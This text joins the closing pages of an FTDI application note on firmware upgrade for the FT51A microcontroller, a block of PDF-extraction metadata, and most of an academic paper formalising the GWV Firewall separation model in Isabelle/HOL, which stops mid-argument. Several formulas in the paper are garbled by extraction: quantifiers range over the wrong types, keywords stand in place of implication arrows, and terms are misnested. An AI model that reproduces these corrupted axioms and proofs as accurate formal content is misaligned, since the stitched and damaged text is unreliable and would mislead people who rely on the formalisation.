An alternative method, which would provide a non-secure manifestation check, would be to program the MTP Flash with code and at the same time validate it. If the validation does not succeed then the Shadow RAM could be committed back to the MTP Flash to overwrite the downloaded firmware. This would not provide a secure solution to validating firmware.
A simpler method would be to implement manifestation in blocks. This could be in the form of some encryption or validation checksum. The blocks would have to be smaller than the available __xdata area on the FT51A.
All these methods add to the size of the code required to implement DFU on the FT51A.
5.3 Recovery
As implemented, a failed download may have programmed some MTP Flash memory but not completed the whole program. In this case the firmware could “commit” the Shadow RAM contents back to MTP Flash rather than rely on the host PC application trying again. It could result in corrupt firmware on the device if the device is power cycled with the MTP Flash in an inconsistent state.
5.4 Security
Some firmware could be secured using the TOP_SECURITY_LEVEL register. This can prevent write access to certain parts of the MTP Flash. It could therefore be manipulated to prevent access to portions of code while allowing other parts to be modified.
6 Contact Information
Head Office – Glasgow, UK
Future Technology Devices International Limited
Unit 1, 2 Seaward Place, Centurion Business Park
Glasgow G41 1HH
United Kingdom
Tel: +44 (0) 141 429 2777
Fax: +44 (0) 141 429 2758
E-mail (Sales) sales1@ftdichip.com
E-mail (Support) support1@ftdichip.com
E-mail (General Enquiries) admin1@ftdichip.com
Branch Office – Tigard, Oregon, USA
Future Technology Devices International Limited (USA)
7130 SW Fir Loop
Tigard, OR 97223-8160
USA
Tel: +1 (503) 547 0988
Fax: +1 (503) 547 0987
E-mail (Sales) us.sales@ftdichip.com
E-mail (Support) us.support@ftdichip.com
E-mail (General Enquiries) us.admin@ftdichip.com
Branch Office – Taipei, Taiwan
Future Technology Devices International Limited (Taiwan)
2F, No. 516, Sec. 1, NeiHu Road
Taipei 114
Taiwan, R.O.C.
Tel: +886 (0) 2 8791 3570
Fax: +886 (0) 2 8791 3576
E-mail (Sales) tw.sales1@ftdichip.com
E-mail (Support) tw.support1@ftdichip.com
E-mail (General Enquiries) tw.admin1@ftdichip.com
Branch Office – Shanghai, China
Future Technology Devices International Limited (China)
Room 1103, No. 666 West Huaihai Road,
Shanghai, 200052
China
Tel: +86 21 62351596
Fax: +86 21 62351595
E-mail (Sales) cn.sales@ftdichip.com
E-mail (Support) cn.support@ftdichip.com
E-mail (General Enquiries) cn.admin@ftdichip.com
Web Site
http://ftdichip.com
Distributor and Sales Representatives
Please visit the Sales Network page of the FTDI Web site for the contact details of our distributor(s) and sales representative(s) in your country.
System and equipment manufacturers and designers are responsible to ensure that their systems, and any Future Technology Devices International Ltd (FTDI) devices incorporated in their systems, meet all applicable safety, regulatory and system-level performance requirements. All application-related information in this document (including application descriptions, suggested FTDI devices and other materials) is provided for reference only. While FTDI has taken care to assure it is accurate, this information is subject to customer confirmation, and FTDI disclaims all liability for system designs and for any applications assistance provided by FTDI. Use of FTDI devices in life support and/or safety applications is entirely at the user’s risk, and the user agrees to defend, indemnify and hold harmless FTDI from any and all damages, claims, suits or expense resulting from such use. This document is subject to change without notice. No freedom to use patents or other intellectual property rights is implied by the publication of this document. Neither the whole nor any part of the information contained in, or the product described in this document, may be adapted or reproduced in any material or electronic form without the prior written consent of the copyright holder. Future Technology Devices International Ltd, Unit 1, 2 Seaward Place, Centurion Business Park, Glasgow G41 1HH, United Kingdom. Scotland Registered Company Number: SC136640
Appendix A – References
Document References
FTDI MCU web page: http://www.ftdichip.com/MCU.html
SDCC web page: http://sdcc.sourceforge.net
Eclipse CDT web page: http://www.eclipse.org/cdt
GnuWin32 make web page: http://gnuwin32.sourceforge.net/packages/make.htm
GnuWin32 coreutils web page: http://gnuwin32.sourceforge.net/packages/coreutils.htm
Hex2Bin web page: http://hex2bin.sourceforge.net
MinGW web page: http://www.mingw.org
GDB online documentation web page: https://sourceware.org/gdb/onlinedocs/gdb
USB Test and Measurement Class specification: http://www.usb.org/developers/docs/devclass_docs/USBTMC_1_006a.zip
USB Device Firmware Update Class specification: http://www.usb.org/developers/docs/devclass_docs/DFU_1.1.pdf
Acronyms and Abbreviations
<table>
<thead>
<tr>
<th>Terms</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>DFU</td>
<td>Device Firmware Upgrade</td>
</tr>
<tr>
<td>MTP Flash</td>
<td>Multiple Time Program – non-volatile memory used to store program code on the FT51A.</td>
</tr>
<tr>
<td>SDCC</td>
<td>Small Device C Compiler</td>
</tr>
<tr>
<td>USB</td>
<td>Universal Serial Bus</td>
</tr>
<tr>
<td>USB-IF</td>
<td>USB Implementers Forum</td>
</tr>
</tbody>
</table>
Appendix B – List of Tables & Figures
List of Figures
Figure 2.1 DFU States ........................................................................................................ 6
Figure 4.1 Installing Device Driver Message ................................................................. 17
Figure 4.2 Device Driver Software Not Installed Message ........................................... 17
Figure 4.3 Device Manager Entry for FT51 Runtime ....................................................... 17
Figure 4.4 Windows Security Confirmation Box ............................................................. 17
Figure 4.5 Update Driver Software Confirmation Box ...................................................... 17
## Appendix C – Revision History
<table>
<thead>
<tr>
<th>Revision</th>
<th>Changes</th>
<th>Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>1.0</td>
<td>Initial Release</td>
<td>2015-12-21</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
[Send Feedback](https://www.ftdichip.com/FTProducts.htm)
|
{"Source-Url": "https://brtchip.com/wp-content/uploads/Support/Documentation/Application_Notes/ICs/MCU/AN_344_FT51A_DFU_Sample.pdf", "len_cl100k_base": 9105, "olmocr-version": "0.1.53", "pdf-total-pages": 25, "total-fallback-pages": 0, "total-input-tokens": 58927, "total-output-tokens": 10547, "length": "2e13", "weborganizer": {"__label__adult": 0.0008635520935058594, "__label__art_design": 0.0008039474487304688, "__label__crime_law": 0.0007863044738769531, "__label__education_jobs": 0.0004119873046875, "__label__entertainment": 0.00014972686767578125, "__label__fashion_beauty": 0.0004825592041015625, "__label__finance_business": 0.000720977783203125, "__label__food_dining": 0.00048160552978515625, "__label__games": 0.001956939697265625, "__label__hardware": 0.25048828125, "__label__health": 0.0005736351013183594, "__label__history": 0.0004906654357910156, "__label__home_hobbies": 0.00045371055603027344, "__label__industrial": 0.003705978393554687, "__label__literature": 0.0003142356872558594, "__label__politics": 0.00039839744567871094, "__label__religion": 0.000957489013671875, "__label__science_tech": 0.088623046875, "__label__social_life": 6.026029586791992e-05, "__label__software": 0.033966064453125, "__label__software_dev": 0.6103515625, "__label__sports_fitness": 0.0006723403930664062, "__label__transportation": 0.002223968505859375, "__label__travel": 0.0002872943878173828}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 41628, 0.03522]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 41628, 0.40395]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 41628, 0.69414]], "google_gemma-3-12b-it_contains_pii": [[0, 458, false], [458, 4067, null], [4067, 4937, null], [4937, 7570, null], [7570, 9348, null], [9348, 10468, null], [10468, 13709, null], [13709, 14104, null], [14104, 16203, null], [16203, 17337, null], [17337, 19752, null], [19752, 22198, null], [22198, 24312, null], [24312, 26854, null], [26854, 29012, null], [29012, 30834, null], [30834, 31085, null], [31085, 33271, null], [33271, 33776, null], [33776, 36156, null], [36156, 39133, null], [39133, 39133, null], [39133, 40544, null], [40544, 41271, null], [41271, 41628, null]], "google_gemma-3-12b-it_is_public_document": [[0, 458, true], [458, 4067, null], [4067, 4937, null], [4937, 7570, null], [7570, 9348, null], [9348, 10468, null], [10468, 13709, null], [13709, 14104, null], [14104, 16203, null], [16203, 17337, null], [17337, 19752, null], [19752, 22198, null], [22198, 24312, null], [24312, 26854, null], [26854, 29012, null], [29012, 30834, null], [30834, 31085, null], [31085, 33271, null], [33271, 33776, null], [33776, 36156, null], [36156, 39133, null], [39133, 39133, null], [39133, 40544, null], [40544, 41271, null], [41271, 41628, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 41628, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 41628, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 41628, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 41628, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 41628, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 41628, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 41628, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 41628, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 41628, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 41628, null]], "pdf_page_numbers": [[0, 458, 1], [458, 4067, 2], [4067, 4937, 3], [4937, 7570, 4], [7570, 9348, 5], [9348, 10468, 6], [10468, 13709, 7], [13709, 14104, 8], [14104, 16203, 9], [16203, 17337, 10], [17337, 19752, 11], [19752, 22198, 12], [22198, 24312, 13], [24312, 26854, 14], [26854, 29012, 15], [29012, 30834, 16], [30834, 31085, 17], [31085, 33271, 18], [33271, 33776, 19], [33776, 36156, 20], [36156, 39133, 21], [39133, 39133, 22], [39133, 40544, 23], [40544, 41271, 24], [41271, 41628, 25]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 41628, 0.0223]]}
|
olmocr_science_pdfs
|
2024-12-08
|
2024-12-08
|
9d4a64af522be0ba3fbb6a1571858f255967156b
|
Formal Methods for MILS: Formalisations of the GWV Firewall
Ruud Koolen
Eindhoven University of Technology
r.p.j.koolen@tue.nl
Julien Schmaltz
Eindhoven University of Technology
j.schmaltz@tue.nl
ABSTRACT
To achieve security certification according to the highest levels of assurance, formal models and proofs of security properties are required. In the MILS context, this includes formalisation of key components – such as separation kernels – and the formalisation of applications built on top of these verified components. In this paper, we use the Isabelle/HOL proof assistant to formalise the Firewall application built on top of a verified separation kernel according to the model of Greve, Wilding, and Vanfleet (GWV). This Firewall application has been formalised twice after the original effort by GWV. These different efforts have been compared and discussed on paper. Our main contribution is to provide a formal comparison between these formalisations in the formal logic of a proof assistant.
1. INTRODUCTION
To achieve security certification at the highest levels of assurance (e.g. EAL6 or EAL7 of the Common Criteria), formal models and proofs are required. In the context of MILS architectures, this not only means the formalisation of key components, like separation kernels, but also the formalisation of more mundane applications and their composition in a complete system.
Within the EURO-MILS project, we aim at providing a modelling and validation environment based on the formalisation of a generic MILS architecture. This environment should ease the development of formal models and proofs of systems built according to the MILS architectural paradigm. We present and discuss three existing efforts about the formal verification of an application built on top of a verified separation kernel. This application is a Firewall originally proposed by Greve, Wilding, and Vanfleet [5], who also proved its correctness using the ACL2 theorem prover [6]. This formalisation was later replicated by Rushby [9], who proved the relevant properties in the logic of the PVS [8] proof system; to do so, he also refined the axiomatisation of the Firewall behaviour. Subsequently, a further refinement of this formalisation was proposed by Van der Meyden [2], who also proves relations between the three efforts using informal pen-and-paper proofs. Our main contribution is to formalise Van der Meyden’s axiomatisation and proofs in the Isabelle/HOL proof assistant [7]. We also re-formulate in Isabelle/HOL the formalisations by GWV and Rushby and the relations between the three axiomatisations. As part of this effort we found a small flaw in Van der Meyden’s axiomatisation, for which we present a corrected version; we regard this as a confirmation of the value of the formalisation of mathematics in the logic of computer proof systems.
In the next three sections, we introduce the Firewall example application, the GWV model of formalised security, and express the Firewall in term of the GWV model. Afterwards, we compare the three different axiomatisations of the Firewall, proving relevant relations between them. We point out a flaw in the axiomatisation of Van der Meyden, and present a corrected version. Finally, we formally show how all three axiomatisations are sufficient to prove the desired properties of the larger system containing the Firewall, which we take as the compositional overall correctness proof.
2. THE FIREWALL APPLICATION
The application Greve, Wilding, and Vanfleet used as an example of their formalisation of security is one that sanitises useful but sensitive information for use by an untrusted application. This so-called Firewall takes as input information presented by trusted parts of the system, which may be sensitive. It then filters and censors this information to produce a version that can safely be passed to applications that are not trusted to handle it securely, and delivers this sanitised information to a location where the untrusted application can find it. Under the assumption that the Firewall application is the only source of information to the untrusted application, this should provably ensure that no sensitive information ever ends up within reach of the untrusted application.
The Firewall application does not exist in a vacuum. It runs on top of an operating system of some sort, specified in more detail in the next section, which provides controlled access to memory. Its job is to divide the system memory into segments and enforce limits on which applications can access which memory segments. To ensure security, it is assumed that the operating system is configured in such a way that the Firewall application is the only component that...
can write to memory segments that are accessible to the untrusted application; moreover, it can only write to a single such a segment, denoted as outbox. This configuration is depicted in Figure 1.
For the purpose of the Firewall example, Greve, Wilding and Vanfleet do not try to express in detail what information is and is not sensitive. Instead, they assume the presence of a predicate black that, for a given memory segment and system state, expresses whether or not that segment contains only nonsensitive information. Thus, in a given state, a memory segment is black if and only if its contents are not sensitive. The function of the Firewall, then, is to make sure it only ever writes black data to outbox. The security requirement we seek to formalise can then be expressed as requiring that none of the memory segments accessible to the untrusted application ever becomes nonblack. The main goal of the different formalisations presented in the remainder of this paper is to prove that this is the case under the assumption that the operating system and Firewall work as specified.
3. THE GWV MODEL OF SEPARATION
The system model proposed by Greve, Wilding and Vanfleet [5] (GWV) guarantees a security property called Separation. Extensions and variations of this model have then been proposed [10, 4] and discussed [3, 1]. We will nonetheless use the original GWV model [5], which is sufficient for the purposes of this paper.
The GWV model defines a mathematical formulation of systems similar to the one presented in Figure 1. At its base, a GWV system is a deterministic state machine, with states denoted s or t. Execution consists of repeatedly changing from a state s to the next state denoted next(s). A GWV system contains a finite set of memory segments, which in each state s have contents denoted select(s, a) for segment a. Furthermore, it contains a finite set of partitions, which represent independent subcomponents akin to processes in general-purpose operating systems. In any state, a single partition is currently active and executing; this partition is denoted current(s) for state s. This basic model is formalised in Isabelle parlance using the following axioms:
\[ \text{fixes current :: State \Rightarrow Partition} \]
\[ \text{fixes select :: State \Rightarrow Segment::finite \Rightarrow Value} \]
\[ \text{fixes next :: State \Rightarrow State} \]
Here, State, Partition, Segment, and Value represent arbitrary sets. The finiteness condition on Partition is irrelevant for the correctness of any of the formalised proofs and has been omitted. Finiteness of Segment, on the other hand, turns out to be crucial.
The GWV model assumes that the different partitions run on top of a separation kernel, a basic operating system tasked with the duty of restricting memory access of partitions to those accesses that satisfy a given security policy. One part of this security policy is a set of memory segments \( \text{segs}(p) \) for each partition \( p \) describing the memory segments that that partition is allowed to access. A more subtle component of the security policy is an information flow policy, represented by a binary relation between memory segments, with the semantics that any computation step that writes to memory segment \( a \) may only do so while reading from a limited set of input memory segments. Thus, information may only flow along the edges of the directed graph represented by the information flow policy. GWV formalise the information flow policy as a function \( \text{dia} \), short for direct interaction allowed, which for each memory segment \( a \) returns a set \( \text{dia}(a) \) of memory segments that are allowed to directly influence it:
\[ \text{fixes segs :: Partition \Rightarrow P(Segment)} \]
\[ \text{fixes dia :: Segment \Rightarrow P(Segment)} \]
The security requirement enforced by the separation kernel can then be expressed as requiring that all memory accesses must respect the security policy. Greve, Wilding, and Vanfleet call this property separation. Rather than describing how a separation kernel might enforce such a security policy, GWV define separation as requiring that all actions performed by a partition must be independent of the contents of memory segments that are not allowed to influence the action. Specifically, they require that whenever a partition writes to a memory segment \( a \), the contents written may depend only on the the contents of the segments that are both in the accessible segments of the executing partition and \( \text{dia}(a) \):
\[ \text{assumes Separation :: State, s \in State, a \in Segment.} \]
\[ \text{current(s) = current(t) \land} \]
\[ \text{select(s, a) = select(t, a) \land} \]
\[ \forall b \in \text{dia}(a) \cap \text{segs(current(s))), select(s, b) = select(t, b) \rightarrow select(next(s), a) = select(next(t), a)} \]
This definition reads that for any segment \( a \), for any states for which both the contents of \( a \) and the active partition are equal, the contents of \( a \) in the next state must be a function of the contents of the memory segments that are both readable by the active partition and allowed to influence \( a \). Thus, in changing the contents of \( a \), the executing partition may not make use of any information other than that allowed by the security policy.
In the GWV system model, the presence and correct functioning of a separation kernel is taken as an assumption, as formalised by the Separation axiom. Greve, Wilding, and Vanfleet propose that this axiom is a useful base for proving security properties of larger systems that rely on a separation kernel as a key component. They use their Firewall
application as an example of how to prove security properties of a larger system by relying on the separation kernel as a provider of the base security infrastructure.
4. FIREWALL IN GWV
In this section, we formally define both the Firewall application and the security property it is supposed to provably establish.
The Firewall application is a partition \( F \) that collects sensitive information from unspecified locations in the system, and passes a sanitised version of this information along to a different partition, \( B \), that cannot be trusted to handle it securely. Relying on the separation kernel to ensure that no other partitions can write to memory segments accessible to the untrusted application, this should ensure that the untrusted application can only ever get access to information that has been judged safe by the Firewall.
GWV satisfy this information flow property as the specific requirement that there is a single memory segment \( \text{outbox} \) accessible to \( B \) which may be influenced by segments accessible to partitions other than \( B \). Furthermore, any such segments that can influence \( \text{outbox} \) can only be accessible by \( F \) and \( B \). Formally:
\[
\begin{align*}
\text{assumes FW_Pol: } & \forall a, b \in \text{Segment}. \ P \in \text{Partition}. \\
& a \in \text{segs}(B) \land \\
& b \in \text{dia}(a) \land \\
& b \in \text{segs}(F) \land \\
& P \neq B \rightarrow \\
& (P = F \land a = \text{outbox})
\end{align*}
\]
Together with the Separation axiom described in the previous section, this should suffice to ensure that the only information that ends up in segments accessible to \( B \) is information that the Firewall put there.
As described in Section 2, the behaviour of the Firewall is modelled using the \( \text{black} \) predicate, which models the distinction between sensitive and nonsensitive information. A memory segment is black in a given state if the contents of that segment in that state does not contain any sensitive information. The security functionality of the Firewall, then, is that it never writes any information to \( \text{outbox} \) that would cause it to become nonblack. This can be formalised as the proposition that \( \text{outbox} \) never changes from black to nonblack while the Firewall partition \( F \) is executing:
\[
\begin{align*}
\text{assumes FW_Blackens: } & \forall s \in \text{State}, a \in \text{Segment}. \\
& \text{current}(s) = F \land \text{black}(s, \text{outbox}) \rightarrow \\
& \text{black}(\text{next}(s), \text{outbox})
\end{align*}
\]
We can now state a formal definition of the correctness of the Firewall application. The desired security property of the complete system including the Firewall, the untrusted application, and any possible other applications is that the segments accessible to \( B \) never become nonblack. The requirement that the segments of \( B \) start black is not a property of the Firewall; the weaker property that can be guaranteed by the Firewall is that the segments of \( B \) are already black, they will remain black. Introducing a function \( \text{run} \) to express the execution of a number of computation steps, this can be formalised as follows:
\[
\begin{align*}
\text{fun run :: } N & \Rightarrow \text{State} \Rightarrow \text{State} \text{ where} \\
& \text{run}(0, s) = s \\
& \text{run}(\text{Suc}(n), s) = \text{run}(n, \text{next}(s))
\end{align*}
\]
\[
\text{theorem FW_Correct: } \forall s \in \text{State}, n \in N, a \in \text{segs}(B). \\
\text{black}(s, a) \rightarrow \text{black}(\text{run}(s, n), a)
\]
The combination of the Separation, FW_Blackens, and FW_Pol axioms is insufficient to prove the FW_Correct property. For this to be the case, we need further properties describing the behaviour of the \( \text{black} \) predicate; for example, if black data in the segments accessible to \( B \) could become nonblack on its own accord, the FW_Correct security property quickly falls apart. It is in the axiomatisation of the \( \text{black} \) predicate that GWV, Rushby, and Van der Meyden differ in their approaches. These three approaches will be the topic of the next section.
5. AXIOMATISATING BLACKNESS
The behaviour of the Firewall is defined in terms of the \( \text{black} \) predicate, which models the property of a segment of memory of not containing any sensitive information. It would be expected for this property to satisfy certain axioms, such as the proposition that a segment cannot change from black to nonblack without the segment contents being modified. Certainly, if a nonsensitive chunk of memory were suddenly to become sensitive without anyone touching that piece of memory, this would violate our assumptions on what sensitivity is supposed to mean.
In their publications, GWV, Rushby, and Van der Meyden take different approaches in characterising the assumed behaviour of the \( \text{black} \) predicate. The basic notion of all three approaches is that nonblack data cannot be generated from black data; any computational process that takes only nonsensitive data as its input must surely produce output that is also nonsensitive. In this section, we compare the three different axiomatisations of this notion, and prove relevant relations between them.
5.1 The GWV Formalisation
One of the main properties that GWV require the \( \text{black} \) predicate to have is that in a system in which all segments are black, all segments will remain black; this is a special case of the “no spontaneous generation of nonblack data” principle described above. Another property they require is that blackness is a function of the content of a memory segment; it is not allowed that the same data is considered black or nonblack depending on the context, as this would allow sensitive data to leak into a completely idle partition.
\[
\begin{align*}
\text{assumes S5: } & \forall a \in \text{Segment}. \text{black}(s, a) \rightarrow \\
& \forall a \in \text{Segment}. \text{black}(\text{next}(s), a)
\end{align*}
\]
\[
\begin{align*}
\text{assumes S6: } & \text{select}(s, a) = \text{select}(t, a) \\
& \text{black}(s, a) = \text{black}(t, a)
\end{align*}
\]
These two properties are not sufficient to prove all desired properties of blackness, however. In particular, we would like to be able to prove a version of S5 restricted to a particular partition: the proposition that when all segments of a partition \( P \) are black in a state in which \( P \) is active, then
all these segments will still be black in the next state. A
lemma like this has an obvious role to play in any potential
proof of FW_Correct.
To make this possible, GWV assume that for every state
s and any segment a, a state can be constructed in which a is
black but which is otherwise identical to s; such a state could
be constructed by, say, wiping the contents of the memory
segment a. To formalise this notion, they posit the existence
of a function scrub producing such a state scrub(a, s), with
straightforward properties:
\textbf{fixes scrub :: Segment ⇒ State ⇒ State}
\textbf{assumes S1:}
\textbf{scrub(a, scrub(b, a)) = scrub(b, scrub(a, s))}
\textbf{assumes S2:}
\(a \neq b \rightarrow \text{select}(\text{scrub}(b, s), a) = \text{select}(s, a)\)
\textbf{assumes S3:}
\textbf{black(\text{scrub}(b, s), a) \iff (a = b \lor \text{black}(s, a))}
\textbf{assumes S4:}
\textbf{current(\text{scrub}(a, s)) = current(s)}
Axioms S1, S2, and S4 together specify that scrub does
not change anything relevant about a state other than the
contents of the scrubbed segment; axiom S3 specifies that a
scrubbed segment is black.
With these properties, the lemma sketched above can be
proven. For if all segments accessible to partition \(P\) are
black in a state \(s\) with \(\text{current}(s) = P\), we can construct a
state \(t\) in which all segments are black by scrubbing all other
segments; per axiom S5, the next state \(\text{next}(t)\) of \(t\) also has
all \(P\)-accessible states black. But \(s\) and \(t\) have the same
contents of all memory segments accessible to \(P\); according
to the Separation axiom, the same must hold for \(\text{next}(s)\)
and \(\text{next}(t)\). Thus, per S6, because all \(P\)-accessible segments in
\(\text{next}(t)\) are black, the same must hold for \(\text{next}(s)\).
The axioms S1 ... S6 together with the FW_Blackens,
FW_Pol, and Separation properties are sufficient to prove the
desired FW_Correct theorem. We shall prove this by
showing that the GWV axioms are stronger than the Rushby
axioms, and that the Rushby axioms are sufficient to prove
FW_Correct, both claims of which are described in the
section below.
\textbf{5.2 Rushby's Version}
The formalisation proposed by Rushby is a reasonably
minor refinement of the original by GWV. Like GWV, Rushby
includes the two main properties from the GWV formalisa-
tion:
\textbf{assumes B4:}
\textbf{select(s, a) = select(t, a) \rightarrow
black(s, a) = black(t, a)}
\textbf{assumes B5:}
\((\forall a \in \text{Segment}. \text{black}(s, a)) \rightarrow
(\forall a \in \text{Segment}. \text{black}(\text{next}(s), a))\)
The difference between the two formalisations is that instead
of a function scrub that replaces the contents of a single
segment by a blackened version, Rushby posits a function
blacken that for a given state scrubs all segments that are
not black.
\textbf{fixes blacken :: State ⇒ State}
\textbf{assumes B1:}
\textbf{black(blacken(s), a)}
\textbf{assumes B2:}
\textbf{black(s, a) \rightarrow select(s, a) = select(blacken(s), a)}
\textbf{assumes B3:}
\textbf{current(s) = current(blacken(s))}
It is clear that this axiomatisation is quite similar to GWV’s
original. The lemma that was proven for the GWV formal-
isation can be proven for Rushby’s version in a very similar
way. Furthermore, it is clear that the Rushby axioms fol-
low from the GWV axioms: the blacken function can be
constructed by calling scrub on each segment that is not
black\(^1\), and the resulting function clearly satisfies the B1,
B2, and B3 axioms.
Unfortunately, formalising this fact in Isabelle proved chal-
lenging. In the logic of Isabelle, the fact that Segment is
finite is expressed as a nonconstructive assertion that a func-
tion \(f :: \mathbb{N} \Rightarrow \text{Segment}\) and a natural number \(n\) exist such
that the segments \(f(m)\) for \(0 \leq m < n\) exactly cover Seg-
ment. Because this is a nonconstructive assertion, we can
only similarly prove in a nonconstructive way that a function
blacken must exist that behaves like a repeated application of
scrub. Both proving that this function exists, and work-
ging with this function to prove properties such as B1 ... B3
about it, are technically challenging; moreover, they result
in cumbersome proofs that are difficult to understand due
to the technical tricks intermixing the substance of the arg-
ument. We consider this a weakness of the Isabelle proof
system; a more readable way of dealing with nonconstruc-
tively existing entities would be a welcome improvement.
Moreover, to avoid turning this section into an unreadable
mess of proof trickery, we have omitted the formal proof that
the GWV axioms imply the Rushby axioms.
Similarly to the previous section, we prove that the axioms
B1 ... B5 combined with the FW_Blackens, FW_Pol, and
Separation properties are sufficient to prove the desired
FW_Correct theorem by reducing this problem to the re-
lated problem for Van der Meyden’s axiom. Doing so will
be the subject of the remainder of this paper.
\textbf{5.3 Van der Meyden's Axiom}
Van der Meyden argues that these axioms defined by GWV
and Rushby unnecessarily restrict the class of systems to
which the results apply. He proposes an alternative formu-
lisation consisting of one axiom over predicate black without
the need of ancillary functions, and thus the richness of the
state space they imply. Rushby’s axiom B5 basically states
that if the entire system is black, then this is still the case
in the next state. Van der Meyden generalises this notion
by requiring that if the value of a memory segment is com-
pared based only on the values of a set of memory segments
\(X\), and all segments in \(X\) are black, then the computed
segment must be black in the next state.
The notion of \textit{being computed based only on a set of memory
segments} is just the same that the Separation axiom. In the Separation axiom, the requirement of
\(^1\)Here the fact that the number of segments if finite is crit-
ical, without this requirement, the function blacken could
not be defined based on scrub.
The security policy is that the content of a memory segment in the next state is a function of its current content, the active partition, and the contents of the memory segments that are allowed to influence it. Using the same construction, Van der Meyden defines his sole axiom formalising \texttt{black} as follows:
\[
\begin{aligned}
\text{fun equals} & : \mathbb{P} (\text{Segment}) \Rightarrow \text{State} \Rightarrow \text{State} \Rightarrow \mathbb{B} \\
\text{where} & \\
\text{equals} (X, s, t) & = \forall a \in X. \text{select} (s, a) = \text{select} (t, a)
\end{aligned}
\]
\textbf{assumes Black:} $\forall X \in \mathbb{P} (\text{Segment}), s \in \text{State}, a \in \text{Segment}$,
\[
(\forall r, t \in \text{Segment} \cdot \text{equals} (X, r, t) \land \\
\text{current} (r) = \text{current} (t) \rightarrow \\
\text{select} (\text{next} (r), a) = \text{select} (\text{next} (t), a)) \\
\text{assumes} (\forall b \in X. \text{black} (s, b)) \\
\text{black} (\text{next} (s), a)
\]
This axiom states that if the value of segment $a$ in the next state of $s$ is a function of the segments in $X$ and the active partition, then this function preserves blackness. In other words, as the value of $a$ is computed based on $X$, so is the blackness of $a$ inherited from $X$.
The \textbf{Black} axiom follows from the Rushby axioms; indeed, the proof for this in Isabelle is very simple. The proof starts by assuming the two premises stated in the \textbf{Black} axiom:
\[
\begin{aligned}
\text{fix} & \ X \ s \ a \\
\text{assume} & 1: \\
(\forall r, t \in \text{Segment} \cdot \text{equals} (X, r, t) \land \\
\text{current} (r) = \text{current} (t) \rightarrow \\
\text{select} (\text{next} (r), a) = \text{select} (\text{next} (t), a)) \\
\text{assume} & (\forall b \in X. \text{black} (s, b)) \\
\text{black} (\text{next} (s), a)
\end{aligned}
\]
Because $a$ is already black in $s$ and is thus unaffected by \texttt{blacken} due to B2, and because \texttt{blacken} does not change the active partition of $s$, according to assumption 1 we have
\[
\text{select} (\text{next} (s), a) = \text{select} (\text{next} (\text{blacken} (s)), a).
\]
\textbf{hence select} (\text{next} (s), a) = \text{select} (\text{next} (\text{blacken} (s)), a) \\
\text{by (metis 1 B2 B3 equals_def)}
\]
But of course \texttt{blacken}$(s)$ is black for all segments; by B5, so is \texttt{next} (\texttt{blacken}$(s)$). Because by B4 blackness is a function of the contents of a memory segment, we get
\[
\text{thus black} (\text{next} (s), a)
\]
\textbf{by (metis B1 B4 B5)}
which completes the proof.
Unfortunately, the \textbf{Black} axiom is not sufficient to show the FW\_Correct security requirement. This problem is the topic of the next section.
6. PRESERVATION OF BLACKNESS
In the paper introducing the \textbf{Black} axiomatisation of the \textbf{black} predicate[2], Van der Meyden appears to prove that together with the FW\_Pol, FW\_Blackens, and \textbf{Separation} axioms, the \textbf{Black} axiom is sufficient to prove the FW\_Correct theorem specifying the secure operation of the Firewall. Unfortunately, this proof is incorrect, and the \textbf{Black} axiom is in fact not strong enough to ensure that the \textbf{black} predicate is sufficiently well-behaved.
To prove FW\_Correct, Van der Meyden correctly shows that partitions other than $B$, including the Firewall partition $F$, can never make any segments of $B$ nonblack. He also shows that $B$ can never make any segments other than \texttt{outbox} nonblack without some other segment already being nonblack. A problem occurs, however, in proving that $B$ can never make \texttt{outbox} nonblack. For this to be the case due to the \textbf{Black} axiom, there needs to be a set of segments $X$ such that the next contents of \texttt{outbox} is a function of the active partition and the contents of the segments in $X$.
Van der Meyden shows that a set of segments $X$ exists such that among all states $s$ for which \texttt{current}$(s) = B$, the contents of \texttt{outbox} in \texttt{next}$(s)$ is a function of the contents of the segments in $X$. That is, he constructs a set $X$ such that for all segments $r$ and $t$ for which \texttt{current}$(r) = \texttt{current} (t) = B$, if \texttt{equals}$(X, r, t)$ holds, then we can conclude \texttt{select} (\texttt{next}$(r)$, \texttt{outbox}) = \texttt{select} (\texttt{next}$(t)$, \texttt{outbox}). Based on the “no spontaneous generation of nonblack data” intuition, we would expect this to be sufficient to show that \texttt{black} (\texttt{next}$(s)$, \texttt{outbox}) holds under the assumption that \texttt{current}$(s) = B$ and all segments in $X$ are black in $s$, and Van der Meyden argues exactly this in his proof of FW\_Correct. This does not follow from the \textbf{Black} axiom, however.
